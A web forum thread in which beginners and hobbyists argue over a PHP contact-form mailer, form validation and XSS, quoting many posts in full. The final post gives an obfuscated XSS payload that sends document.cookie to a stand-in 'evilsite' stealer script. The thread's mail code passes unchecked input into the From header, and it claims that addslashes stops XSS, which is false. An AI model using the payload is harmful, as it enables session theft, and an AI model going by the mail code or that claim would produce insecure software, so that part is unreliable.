This is my form:


<p><strong>Contact form</strong></p>
<form id="form1" name="form1" method="post" action="send_contact.php">
<p>Name:
<input type="text" name="name" id="name" />
</p>
<p>&nbsp;</p>
<p>E-Mail Address:
<input type="text" name="email" id="email" />
</p>
<p>&nbsp;</p>
<p>Subject of Enquiry:
<input type="text" name="subject" id="subject" />
</p>
<p>&nbsp;</p>
<p>Please enter your message below: </p>
<p>
<textarea name="message" id="message" cols="45" rows="5"></textarea>
</p>
<p align="center">
<input type="submit" name="submit" id="submit" value="Submit" />
<input type="reset" name="reset" id="reset" value="Reset" />
</p>
</form>What would be my form action on send_contact.php?

+rep to all contributors (where possible)

Also - how do I record IP addresses, and show it to users, like on Galaxy-Webhosting?
and how do I make it so you cannot submit the form without the fields filled in?

Sorry for my n00b =[.

TML

Closed by Meti (Forum Moderator): Thread closed due to arguments.

You wanting the form to be emailed to you?

Clientside form validation:

<head>
<script>
function validate(){
if(document.form1.name.value==null||document.form1 .name.value=''){
alert('Please enter your name.'); return false;
}
if(document.form1.email.value=null||document.form1 .email.value=''){
alert('Please enter your email.'); return false;
}
</script>
</head>
...
<form blahblah... onSubmit="return validate()">

Hopefully that should work.

yes id like it emailed to [email protected]

I wouldn't recommend using Jxhn javascript, you're best off using server side validation because people can easily disable javascript - and that means they'll need not valid so you'll need to impliment it on server side anyway.

You can attach the IP by appending $_SERVER['REMOTE_ADDR'] on the email and that will allow the reader to see who emailed it.

I wouldn't recommend using Jxhn javascript, you're best off using server side validation because people can easily disable javascript - and that means they'll need not valid so you'll need to impliment it on server side anyway.

Seriously who'd do that just to send a blank email. It doesn't really matter if they do, it's only for people that forget or don't realise they have to fill out some fields, if they're really determined they'd used an invisible character and unless the php checked for them then it'd get past that aswell.

It's not like his website is gonna get hacked if he doesn't know their name.

And with javascript you can use onBlur to make forms validate when they're deselected.

Well search engines have javascript disabled and many if not most do submit the forms to extend your site index listing - so you'll get fake emails sent from search engines. Also this will allow your site to be susceptible to spamming and I mean, why bother? when it's just as easier to make the backend validate. But hey, up to you, obviously you don't care about spam.

Thanks for your help.

I'm not worried about people sending spam emails, its just a website for a client. Its just so people remember to put their email so we ca reply to them.

Dreamweaver dosn't have a tool for creating a form action page, so i'm kind of screwed =[

Well search engines have javascript disabled and many if not most do submit the forms to extend your site index listing - so you'll get fake emails sent from search engines. Also this will allow your site to be susceptible to spamming and I mean, why bother? when it's just as easier to make the backend validate. But hey, up to you, obviously you don't care about spam.

Search engines don't submit forms as far as I know, it's never happened on any site I've run and if it did happen thenthe bot would find it's way into insecure sites and end up deleting pages, databases etc.

Also you'd need a captcha sort of thing to stop spam.

Here, it's in PHP so you don't need to play around.


<b>Form:</b>
<?php
if(isset($_POST['send'])) {
if((empty($name) || empty($email) || empty($subject) || empty($message)) {
echo "One of the fields hasn't been filled in!";
} else {
$name = addslashes(htmlspecialchars($_POST['name']));
$email = addslashes(htmlspecialchars($_POST['email']));
$subject = addslashes(htmlspecialchars($_POST['subject']));
$message = addslashes(htmlspecialchars($_POST['message']));
$ip = $_SERVER['REMOTE_ADDR'];

$mail = "[email protected]";
$sub = "Email from $name";
$msg = "Here's $name's email:
Name: $name
Email: $email
IP: $ip
Subject: $subject
Message: $message";
$headers = "From: $email";

mail("$mail","$sub","$msg","$headers");

echo "Thanks, your form has been sent, we will reply within 24 hours!";
}
} else {
echo "<form method='post' action='$_SERVER[PHP_SELF]'>
Name:<br>
<input type='text' name='name' size='20'><br>
Email:<br>
<input type='text' name='email' size='20'><br>
Subject:<br>
<input type='text' name='subject' size='20'><br>
Message:<br>
<textarea name='message' cols='45' rows='6'></textarea><br>
<input type='submit' name='send' value='Send'>
</form>";
}
?>

Thanks!

it dosnt work.

Edited by Meti (Forum Moderator): Please do not double post, when you simply can edit your first post.

Post the error?

I pasted the code into notepad, saved as "form.php" and then opened it in firefox and nothing happened.

Okay well there was a few things wrong with the script that Dilore produced. Firstly it had a syntax error (excess "(" bracket in the form validation). Secondly he's using addslashes which might double slash strings may end up like "code\\'s" as magic quotes is on by default. Thirdly he defines the variables $name, $email, $subject, $message, etc after it checks if they're empty... well of course they're going to be empty - no variable of such exists! But if you must use his terrible example here is a version which should work.



<b>Form:</b>
<?php
if(isset($_POST['send'])) {
$name = addslashes(htmlspecialchars($_POST['name']));
$email = addslashes(htmlspecialchars($_POST['email']));
$subject = addslashes(htmlspecialchars($_POST['subject']));
$message = addslashes(htmlspecialchars($_POST['message']));
if(empty($name) || empty($email) || empty($subject) || empty($message)) {
echo "One of the fields hasn't been filled in!";
} else {

$ip = $_SERVER['REMOTE_ADDR'];

$mail = "[email protected]";
$sub = "Email from $name";
$msg = "Here's $name's email:
Name: $name
Email: $email
IP: $ip
Subject: $subject
Message: $message";
$headers = "From: $email";

mail("$mail","$sub","$msg","$headers");

echo "Thanks, your form has been sent, we will reply within 24 hours!";
}
} else {
echo "<form method='post' action='$_SERVER[PHP_SELF]'>
Name:<br>
<input type='text' name='name' size='20'><br>
Email:<br>
<input type='text' name='email' size='20'><br>
Subject:<br>
<input type='text' name='subject' size='20'><br>
Message:<br>
<textarea name='message' cols='45' rows='6'></textarea><br>
<input type='submit' name='send' value='Send'>
</form>";
}
?>
But I do not condon it!

Thats where you're wrong Iszak.. there are variables there if you look $name and so on.. If the recipient doesn't fill in one of them fields they will get a message telling them that they haven't filled one in so it works. The only syntax error I can see is with the last bracket, it needs 2.

Yes except.. there is no variables called $name, $email, $subject etc prior so look at this example.


<?php
if (isset($_POST['send']))
{
if(empty($name) || empty($email) || empty($subject) || empty($message))
{
echo "One of the fields hasn't been filled in!";
}

else
{
$name = addslashes(htmlspecialchars($_POST['name']));
$email = addslashes(htmlspecialchars($_POST['email']));
$subject = addslashes(htmlspecialchars($_POST['subject']));
$message = addslashes(htmlspecialchars($_POST['message']));
// The other code
}
}

else
{
// The else
}
?>


taken directly from your code - as you can see that it's checking if $name, $value, etc are empty yet there is no values assigned to those until later once it's passed the form validation.

Yes except.. there is no variables called $name, $email, $subject etc prior so look at this example.


<?php
if (isset($_POST['send']))
{
if(empty($name) || empty($email) || empty($subject) || empty($message))
{
echo "One of the fields hasn't been filled in!";
}

else
{
$name = addslashes(htmlspecialchars($_POST['name']));
$email = addslashes(htmlspecialchars($_POST['email']));
$subject = addslashes(htmlspecialchars($_POST['subject']));
$message = addslashes(htmlspecialchars($_POST['message']));
// The other code
}
}

else
{
// The else
}
?>


taken directly from your code - as you can see that it's checking if $name, $value, etc are empty yet there is no values assigned to those until later once it's passed the form validation.

Variables don't have to be declared, it's just better coding if they are.
If I made a script like this:


<?php echo $lol; ?>

and went to script.php?lol=John. 'John' would be outputted.

I don't see the point in using addslashes and htmlspecialchars though. It's going to an email so there's no risk of XSS and there's no SQL, so no risk of SQL injection.

Yes except.. there is no variables called $name, $email, $subject etc prior so look at this example.


<?php
if (isset($_POST['send']))
{
if(empty($name) || empty($email) || empty($subject) || empty($message))
{
echo "One of the fields hasn't been filled in!";
}

else
{
$name = addslashes(htmlspecialchars($_POST['name']));
$email = addslashes(htmlspecialchars($_POST['email']));
$subject = addslashes(htmlspecialchars($_POST['subject']));
$message = addslashes(htmlspecialchars($_POST['message']));
// The other code
}
}

else
{
// The else
}
?>
taken directly from your code - as you can see that it's checking if $name, $value, etc are empty yet there is no values assigned to those until later once it's passed the form validation.Thats what it is meant to do? If they submit the form and don't fill in any fields, when they press Submit it will kick them an error.

Jxhn, are you a complete noob that wants to act as if you know what you're talking about, because that's what it seems like. Firstly by making a page called file.php with the following code
<?php echo $lol; ?> and then going to the url file.php?lol=John it will not output "John" it will output nothing! because $lol isn't assigned to any variable. You can get it like that though by using extract($_GET); such example is like
<?php
extract($_GET);
echo $lol; ?> but other than that, your comment makes you look like an idiot. Secondly I said nothing about XSS or SQL Injections, I was simply only using what the guy who posted used and the negatives of using it. Thirdly XSS attacks can be dangerous, by using it they could add javascript in which could result in a hijack of their session etc. just have a look at a XSS example by wikipedia.


DOM-based attack[18]
1. Mallory sends the URL of a maliciously constructed web page to Alice, using email or another mechanism.
2. Alice clicks on the link.
3. The malicious web page's JavaScript opens a vulnerable HTML page installed locally on Alice's computer.
4. The vulnerable HTML page contains JavaScript which executes in Alice's computer's local zone.
5. Mallory's malicious script now may run commands with the privileges Alice holds on her own computer.
Yeah, no real XSS danger there!

Excellent2 - That's only a snippet of the original code but that's the general idea it was mainly from Dilore though.

Seriously Jxhn if you're going to make claims at least have the knowledge to back it up.

Jxhn, are you a complete noob that wants to act as if you know what you're talking about, because that's what it seems like. Firstly by making a page called file.php with the following code
<?php echo $lol; ?> and then going to the url file.php?lol=John it will not output "John" it will output nothing! because $lol isn't assigned to any variable. You can get it like that though by using extract($_GET); such example is like
<?php
extract($_GET);
echo $lol; ?> but other than that, your comment makes you look like an idiot. Secondly I said nothing about XSS or SQL Injections, I was simply only using what the guy who posted used and the negatives of using it. Thirdly XSS attacks can be dangerous, by using it they could add javascript in which could result in a hijack of their session etc. just have a look at a XSS example by wikipedia.
Yeah, no real XSS danger there!

Excellent2 - That's only a snippet of the original code but that's the general idea it was mainly from Dilore though.

Seriously Jxhn if you're going to make claims at least have the knowledge to back it up.
No, I know what I'm talking about, because it's only very simple php. Which is why I don't reply to a lot of other topics.

Try the file yourself before having a fit at me. How do you think variable poisoning works? It's because variables don't have to be declared.
http://johnphptest.freehostia.com/loljohn.php?lol=John

And as for the XSS I wasn't talking to you specifically about that, but there s no danger, because it's being sent to an email. So unless the email site is vulnerable to XSS then there is no vulnerability. And if it was then attackers could send emails themselves without his form, provided they knew the adress.

FreeHostia obviously extracts the variables, but majority of servers do not do this, if you actually had your own host you'll be able to tell, here look at my example then get a real host. http://iszak.net/lolatjxhn.php?jxhn=Noob now do you see - on a real host echo $jxhn does not output "Noob" because most hosts are not crap free hosts. Also if you read what I quoted about XSS you could see that the form does pose a threat if gpc magic quotes is disabled and no stripping is done. READ.



1. Mallory sends the URL of a maliciously constructed web page to Alice, using email or another mechanism.
2. Alice clicks on the link.
3. The malicious web page's JavaScript opens a vulnerable HTML page installed locally on Alice's computer.
4. The vulnerable HTML page contains JavaScript which executes in Alice's computer's local zone.
5. Mallory's malicious script now may run commands with the privileges Alice holds on her own computer.
oh what's that on the first line?



1. Mallory sends the URL of a maliciously constructed web page to Alice, using email or another mechanism.
WOW USING AN EMAIL! Hence my point, if they enter their content and send it - they could potentially add their own hyperlink, the receiver of the email can then go from there look at no. 2 onwards. I think I know a little more about PHP than you, and you're only making yourself look like a bigger noob.

Edit: And if the host did this for both $_GET and $_POST data, well this could cause conflicts if the naming is the same, I'm sure there is a reason why most hosts have this 'feature' disabled.

Iszak usualy knows what he is talking about, he's done many scripts for me that work fine.

FreeHostia obviously extracts the variables, but majority of servers do not do this, if you actually had your own host you'll be able to tell, here look at my example then get a real host. http://iszak.net/lolatjxhn.php?jxhn=Noob now do you see - on a real host echo $jxhn does not output "Noob" because most hosts are not crap free hosts. Also if you read what I quoted about XSS you could see that the form does pose a threat if gpc magic quotes is disabled and no stripping is done. READ.

oh what's that on the first line?

WOW USING AN EMAIL! Hence my point, if they enter their content and send it - they could potentially add their own hyperlink, the receiver of the email can then go from there look at no. 2 onwards. I think I know a little more about PHP than you, and you're only making yourself look like a bigger noob.

Edit: And if the host did this for both $_GET and $_POST data, well this could cause conflicts if the naming is the same, I'm sure there is a reason why most hosts have this 'feature' disabled.
I agree that he's making himself look like a bigger noob than he already is.

FreeHostia obviously extracts the variables, but majority of servers do not do this, if you actually had your own host you'll be able to tell, here look at my example then get a real host. http://iszak.net/lolatjxhn.php?jxhn=Noob now do you see - on a real host echo $jxhn does not output "Noob" because most hosts are not crap free hosts. Also if you read what I quoted about XSS you could see that the form does pose a threat if gpc magic quotes is disabled and no stripping is done. READ.

oh what's that on the first line?

WOW USING AN EMAIL! Hence my point, if they enter their content and send it - they could potentially add their own hyperlink, the receiver of the email can then go from there look at no. 2 onwards. I think I know a little more about PHP than you, and you're only making yourself look like a bigger noob.

Edit: And if the host did this for both $_GET and $_POST data, well this could cause conflicts if the naming is the same, I'm sure there is a reason why most hosts have this 'feature' disabled.

Well, sorry. I'd always thought they didn't need to be declared. It's something to do with the php settings about register globals I think. You must have been right.

I still don't agree on the XSS side though. All of those sorts of things have been patched by browsers for years, and why would the link have to have been sent through email? If they were easily possible then the link I sent you back there could have done it to you. I don't consider what you described to be XSS. XSS is not prevented by magicquotes or addslashes btw.

The reason I don't have my own host is because I don't have any websites and I'm not gonna buy one just to mess about.

I think you need to grow up a little though, calling someone a noob when they oppose you, even if they're wrong will just make you look immature. It's like when someone calls a chav gay (no offence to homosexuals (or chavs)). Like many others in the coding community here I think you just need to calm down a bit. If I said "I think I know little more about XSS and SQL injections than you", you'd think I was being cocky.

Firstly you're right the link you sent could easily have done it. Secondly that example is from wikipedia, now yes anyone can edit wikipedia but it's likely to be correct as it's moderated. Thirdly XSS can be prevented via addslashes or magicquotes, for example by using addslashes you may prevent people insert javascript, This is XSS. Thirdly, if you say you knew a little more about XSS and SQL injections than me, I'd probably believe you although I would question it somewhat. I'm not into XSS and SQL Injections massively - more so PHP. But if someone is going to tell me that I'm wrong when I've got experience under my belt, I'm not going to allow you to walk all over me and say some incorrect information in which other people might believe. That is why I was immature and called you a noob, because you were stubborn and wouldn't believe me - but then again you have no reason to believe me.

Firstly you're right the link you sent could easily have done it. Secondly that example is from wikipedia, now yes anyone can edit wikipedia but it's likely to be correct as it's moderated. Thirdly XSS can be prevented via addslashes or magicquotes, for example by using addslashes you may prevent people insert javascript, This is XSS. Thirdly, if you say you knew a little more about XSS and SQL injections than me, I'd probably believe you although I would question it somewhat. I'm not into XSS and SQL Injections massively - more so PHP. But if someone is going to tell me that I'm wrong when I've got experience under my belt, I'm not going to allow you to walk all over me and say some incorrect information in which other people might believe. That is why I was immature and called you a noob, because you were stubborn and wouldn't believe me - but then again you have no reason to believe me.

Thanks for the recognition.

Btw example of XSS without quotes:

http://somesite.com/transparentimage.gif height=100 width=100% onmouseover=document.location=String.fromCharCode( 104,116,116,112,58,47,47,101,118,105,108,115,105,1 16,101,46,99,111,109,47,115,116,101,97,108,101,114 ,46,112,104,112,63,99,111,111,107,105,101,61)+docu ment.cookie style=position:absolute;left:0px;top:0px

This thread has got quite off topic, so this will probably be my last post in it.